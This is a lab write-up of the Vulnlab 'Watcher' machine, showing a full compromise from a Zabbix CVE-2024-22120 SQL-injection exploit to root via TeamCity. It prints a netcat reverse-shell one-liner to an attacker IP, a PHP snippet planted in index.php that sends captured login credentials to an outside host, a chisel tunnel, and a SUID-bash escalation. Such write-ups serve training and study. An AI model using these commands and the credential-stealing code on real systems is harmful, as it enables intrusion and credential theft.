Here are my notes on the WATCHER box from Vulnlab, which was deployed to HackTheBox.
WATCHER: 10.10.97.38
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f0e4e7ae272214090cfe1aaa85a8c3a5 (ECDSA)
|_ 256 fda3b9361739251d406d5a0797b34213 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://watcher.vl/
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://10.10.97.38 -H "HOST: FUZZ.watcher.vl" --fs 4991
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://10.10.97.38/ -H "HOST: FUZZ.watcher.vl" --fs 4991
zabbix [Status: 200, Size: 3946, Words: 199, Lines: 33, Duration: 323ms]
zabbix.watcher.vl:
No default creds. There is a "Sign in as guest" option, which is the interesting one, so log in as guest as usual.
Zabbix 7.0.0alpha1. This version is affected by CVE-2024-22120, a time-based blind SQL injection through the unsanitized clientip field of the audit log entry that zabbix_server writes when a script is executed; with a valid session id and a host id it can be used to pull the admin session id and the session_key used to sign the zbx_session cookie out of the database.
https://github.com/W01fh4cker/CVE-2024-22120-RCE
zbx_session=eyJzZXNzaW9uaWQiOiIxMWQ5MjJmZTAxODg2MTVhYTFmNjE2NDQxYzU0MTI5ZSIsInNlcnZlckNoZWNrUmVzdWx0Ijp0cnVlLCJzZXJ2ZXJDaGVja1RpbWUiOjE3MzIwMzU3ODQsInNpZ24iOiIwOGVlYTE5OTNhMWVjODFkNzk3ZjVhMzE5ZmM5NzdkMTFiOTgwNTAyY2FjNjVjODM3YzRjMDQ1ZGYxMjQwZWU0In0%3D
Base64 Decoded:
{"sessionid":"e29c48d946f1a3135fe7ceec60d0ff0d","serverCheckResult":true,"serverCheckTime":1732035784,"sign":"08eea1993a1ec81d797f5a319fc977d11b980502cac65c837c4c045df1240ee4"}
hostid=10084
python3 CVE-2024-22120-RCE.py --ip 10.10.97.38 --sid e29cc8d946f1a3135fe7ceec60d0ff0d --hostid 10084
python3 zabbix_server_time_based_blind_sqli.py --ip 10.10.79.255 --sid e29cc8d946f1a3135fe7ceec60d0ff0d --hostid 10084 | grep "(+)"
e29cc8d946f1a3135fe7ceec60d0ff0d
(+) session_id=e29c48d946f1a3135fe7ceec60d0ff0d
(+) admin session_id=e29c48d946f1a3135fe7ceec60d0ff0d
(+) session_key=b9857bc76e26cf108766043dbf43544b, admin session_id=e29c48d946f1a3135fe7ceec60d0ff0d. Now you can genereate admin zbx_cookie and sign it with session_key
python3 zabbix_server_time_based_blind_sqli.py --ip 10.10.97.38 --sid e29cc8d946f1a3135fe7ceec60d0ff0d --hostid 10084 | grep "(+)"
zbx_session=eyJzZXNzaW9uaWQiOiIxMzYyYTYxMDAyYjY3ZGNkYTBkNDY4MWEzMTk2N2I5MSIsInNpZ24iOiJmMTIxNmM1OGU3ZGVhMzY4N2IyYzQ3MjIyZDk4OGFhN2Y5ZmY0MDNjZTMyNzk4YWJjODg5NzY0OTA2YmRlMWVmIn0%3D
Base64 Decoded:
{"sessionid":"1362a61002b67dcda0d4681a31967b91","sign":"f1216c58e7dea3687b2c47222d988aa7f9ff403ce32798abc889764906bde1ef"}
hostid=10084
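As an added example (not part of these notes or the exploit repo), a small Python helper that decodes the zbx_session cookies shown above (URL-decode, base64, JSON) and reports the fields a reviewer would check. The sample cookie is the forged-admin one from these notes; the field length checks and the note about the server-check fields are my own assumptions about the cookie format.

```python
import base64
import json
import re
from urllib.parse import unquote

# Constructed sample: the forged-admin zbx_session cookie from these notes.
SAMPLE_COOKIE = (
    "zbx_session=eyJzZXNzaW9uaWQiOiIxMzYyYTYxMDAyYjY3ZGNkYTBkNDY4MWEzMTk2N2I5MSIs"
    "InNpZ24iOiJmMTIxNmM1OGU3ZGVhMzY4N2IyYzQ3MjIyZDk4OGFhN2Y5ZmY0MDNjZTMyNzk4YWJjODg5NzY0OTA2YmRlMWVmIn0%3D"
)

HEX32 = re.compile(r"^[0-9a-f]{32}$")   # sessionid: 32 hex chars (assumption)
HEX64 = re.compile(r"^[0-9a-f]{64}$")   # sign: SHA-256-sized hex (assumption)


def decode_zbx_session(cookie: str) -> dict:
    """Decode a zbx_session cookie into its JSON fields.

    Accepts either the bare value or a 'zbx_session=...' pair, with the
    base64 padding URL-encoded ('%3D'), literal ('=') or stripped.
    """
    value = cookie.split("=", 1)[1] if cookie.startswith("zbx_session=") else cookie
    raw = unquote(value.strip())
    raw += "=" * (-len(raw) % 4)  # restore padding if the client stripped it
    return json.loads(base64.b64decode(raw))


def inspect_zbx_session(cookie: str) -> dict:
    """Decoded fields plus sanity checks: well-formed sessionid and sign, and
    whether the serverCheckResult/serverCheckTime fields that the frontend
    added to the guest cookie are present (the forged cookie lacks them)."""
    data = decode_zbx_session(cookie)
    known = {"sessionid", "sign", "serverCheckResult", "serverCheckTime"}
    return {
        "sessionid": data.get("sessionid"),
        "sign": data.get("sign"),
        "sessionid_ok": bool(HEX32.match(str(data.get("sessionid", "")))),
        "sign_ok": bool(HEX64.match(str(data.get("sign", "")))),
        "has_server_check": {"serverCheckResult", "serverCheckTime"} <= set(data),
        "extra_fields": sorted(set(data) - known),
    }


if __name__ == "__main__":
    print(json.dumps(inspect_zbx_session(SAMPLE_COOKIE), indent=2))
```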
python3 CVE-2024-22120-RCE.py --ip 10.10.112.2 --sid 1362a61002b67dcda0d4681a31967b91 --hostid 10084
python3 CVE-2024-22120-RCE.py --ip zabbix.watcher.vl --sid 1362a61002b67dcda0d4681a31967b91 --hostid 10084
(!) sessionid=e29cc8d946f1a3135fe7ceec60d0ff0d
[zabbix_cmd]>>: whoami
zabbix
[zabbix_cmd]>>: hostname
watcher.vl
RCE-ACHIEVED !
Convert it into a user-shell as usual.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.8.0.71 4444 >/tmp/f
zabbix@watcher:/$ whoami
whoami
zabbix
zabbix@watcher:/$ hostname
hostname
watcher.vl
USER-SHELL !
zabbix@watcher:/$ cat user.txt
cat user.txt
VL{REDIRECTED}
USER.TXT: VL{REDIRECTED}
PRIV ESC:
pspy64s output:
[SNIP]
2025/01/21 17:01:26 CMD: UID=115 PID=1455 | /usr/local/sbin/zabbix_server: configuration syncer [synced configuration in 0.089428 sec, idle 10 sec]
2025/01/21 17:01:26 CMD: UID=115 PID=1454 | /usr/local/sbin/zabbix_server: service manager #1 [processed 0 events, updated 0 event tags, deleted 0 problems, synced 0 service updates, idle 5.011535 sec during 5.011594 sec]
2025/01/21 17:01:26 CMD: UID=115 PID=1453 | /usr/local/sbin/zabbix_server: ha manager
2025/01/21 17:01:26 CMD: UID=115 PID=1449 | /usr/local/sbin/zabbix_server -c /usr/local/etc/zabbix_server.conf
2025/01/21 17:01:26 CMD: UID=0 PID=14 |
2025/01/21 17:01:26 CMD: UID=0 PID=1340 | /usr/lib/jvm/java-1.11.0-openjdk-amd64/bin/java -ea -Xms16m -Xmx64m -cp ../launcher/lib/launcher.jar jetbrains.buildServer.agent.Launcher -ea -XX:+DisableAttachMechanism --add-opens=java.base/java.lang=ALL-UNNAMED -XX:+IgnoreUnrecognizedVMOptions -Xmx384m -Dteamcity_logs=../logs/ -Dlog4j2.configurationFile=file:../conf/teamcity-agent-log4j2.xml jetbrains.buildServer.agent.AgentMain -file ../conf/buildAgent.properties
2025/01/21 17:01:26 CMD: UID=0 PID=13 |
2025/01/21 17:01:26 CMD: UID=116 PID=1267 | /usr/sbin/mysqld
2025/01/21 17:01:26 CMD: UID=0 PID=12 |
2025/01/21 17:01:26 CMD: UID=0 PID=112 | /lib/systemd/systemd-journald
2025/01/21 17:01:26 CMD: UID=0 PID=11 |
2025/01/21 17:01:26 CMD: UID=0 PID=1010 | /usr/lib/jvm/java-1.11.0-openjdk-amd64/bin/java -Djava.util.logging.config.file=/root/TeamCity/conf/logging.alDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -server -Xmx2g -Dteamcity.configuration.path=../conf/teamcity-startup.properties -Dlog4j2.configurationFile=file:/root/TeamCity/bin/../conf/teamcity-server-log4j.xml -Dteamcity_logs=/root/TeamCity/bin/../logs -Djava.awt.headless=true -Dignore.endorsed.dirs= -classpath /root/TeamCity/bin/bootstrap.jar:/root/TeamCity/bin/tomcat-juli.jar -Dcatalina.base=/root/TeamCity -Dcatalina.home=/root/TeamCity -Djava.io.tmpdir=/root/TeamCity/temp org.apache.catalina.startup.Bootstrap start
2025/01/21 17:01:26 CMD: UID=0 PID=1 | /sbin/init
2025/01/21 17:01:58 CMD: UID=0 PID=4645 |
2025/01/21 17:02:01 CMD: UID=115 PID=4650 | sh -c who | wc -l
2025/01/21 17:02:01 CMD: UID=115 PID=4652 | wc -l
2025/01/21 17:02:01 CMD: UID=115 PID=4651 | sh -c who | wc -l
2025/01/21 17:02:01 CMD: UID=0 PID=4653 | /usr/sbin/CRON -f -P
2025/01/21 17:02:01 CMD: UID=0 PID=4654 | /bin/sh -c /usr/bin/python3 /root/scripts/login.py
2025/01/21 17:02:01 CMD: UID=0 PID=4655 | /usr/bin/python3 /root/scripts/login.py
2025/01/21 17:02:13 CMD: UID=0 PID=4657 | df -k /root/.BuildServer/system
There is a TeamCity server running on TCP port 8111 (as root, per the pspy output above), so forward it out with chisel:
./chisel server -p 53 --reverse
./chisel client 10.8.0.71:53 R:8111:127.0.0.1:8111
It seems login.py (run by root's cron every minute) logs in to the Zabbix login page, so we can modify Zabbix's index.php by embedding the malicious snippet into the original file to capture the submitted credentials.
Snippet to embed in index.php:
$name = $_POST['name'] ?? 'Unknown';
$password = $_POST['password'] ?? 'Unknown';
// Prepare the log entry
//$logEntry = "Name: " . $name . ", Password: " . $password . "\n";
// Write the log entry to the file /tmp/log.txt
// The FILE_APPEND flag ensures the entry is added at the end of the file
// The file will be created if it does not exist
//file_put_contents('/tmp/log.txt', $logEntry, FILE_APPEND);
file_get_contents('http://REDACTED/x?name=' . $_POST['name'] . '&pass=' . $password);
//echo "Data logged successfully2!";
Example: the snippet embedded in the original index.php, right after session_write_close():
[SNIP]
session_write_close();
$name = $_POST['name'] ?? 'Unknown';
$password = $_POST['password'] ?? 'Unknown';
// Prepare the log entry
//$logEntry = "Name: " . $name . ", Password: " . $password . "\n";
// Write the log entry to the file /tmp/log.txt
// The FILE_APPEND flag ensures the entry is added at the end of the file
// The file will be created if it does not exist
//file_put_contents('/tmp/log.txt', $logEntry, FILE_APPEND);
file_get_contents('http://10.8.0.71/x?name=' . $_POST['name'] . '&pass=' . $password);
//echo "Data logged successfully2!";
Then wait a few minutes for the cron job to hit the login page and send the credentials. Alternatively, append the raw POST array to a file in the web root instead of calling back:
file_put_contents('/usr/share/zabbix/blablabla',print_r($_POST,true),FILE_APPEND);
root@watcher:/usr/share/zabbix# tail -f blablabla
Array
(
[name] => Frank
[password] => R%)3S7^Hf4TBobb(gVVs
[enter] => Sign in
)
# If the captured values come back as "Unknown", just move on and use frank's creds.
frank:R%)3S7^Hf4TBobb(gVVs
python3 -c 'import pty; pty.spawn("/bin/bash")'
TeamCity:
frank:R%)3S7^Hf4TBobb(gVVs
TeamCity has an agent enrolled. The agent runs as root on this Linux box, so commands run through the agent terminal in the TeamCity UI give root RCE.
# whoami
root
# hostname
watcher.vl
# chmod u+s /bin/bash
bash-5.1$ whoami
whoami
zabbix
bash-5.1$ ls -lah /bin/bash
ls -lah /bin/bash
-rwsr-xr-x 1 root root 1.4M Mar 14 2024 /bin/bash
bash-5.1$ /bin/bash -p
/bin/bash -p
whoami
root
id
uid=115(zabbix) gid=122(zabbix) euid=0(root) groups=122(zabbix)
hostname
watcher.vl
ROOT-SHELL !
pwd
/root
ls
TeamCity
root.txt
scripts
snap
cat root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
Remaining ports from the nmap scan:
10050/tcp open zabbix-agent
10051/tcp open zabbix-trapper
39743/tcp open java-rmi Java RMI
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Related writeups:
https://github.com/dpgg101/VulnLab/blob/main/Watcher/Watcher.md
https://github.com/purplestormctf/Writeups/blob/main/vulnlab/machines/Watcher/Watcher.md
